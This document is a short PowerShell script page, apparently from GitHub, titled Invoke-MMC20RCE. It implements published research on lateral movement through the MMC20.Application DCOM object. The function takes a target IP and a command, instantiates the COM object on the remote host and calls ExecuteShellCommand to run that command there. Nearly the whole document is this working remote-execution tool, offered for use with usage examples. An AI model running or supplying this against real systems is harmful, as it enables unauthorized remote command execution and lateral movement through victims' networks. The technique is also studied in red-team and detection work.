/
Invoke-MMC20RCE.ps1
34 lines (31 loc) · 1.03 KB
/
Invoke-MMC20RCE.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
function Invoke-MMC20RCE {
<#
.SYNOPSIS
Research on Lateral movement using MMC20.Application COM Object by Matt "enigma0x3" Nelson
A simple implementation by Tanoy "n0tty" Bose
.Description
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
.Parameter IP
Specify the target IP address.
.Parameter CMD
Specify the command that needs to be executed.
.Parameter PARAMS
Additional parameters that
.Example
Invoke-MMC20RCE -ip 127.0.0.1 -cmd cmd.exe -params "if any parameters required"
Invoke-MMC20RCE -ip 127.0.0.1 -cmd "C:\Windows\System32\cmd.exe" -params "if any parameters required"
#>
param(
[Parameter(Mandatory=$true)]
[String]
$IP,
[Parameter(Mandatory=$true)]
[String]
$cmd,
[Parameter(Mandatory=$false)]
[String]
$params
)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",$IP))
$com.Document.ActiveView.ExecuteShellCommand($cmd,$null,$params,"7")
}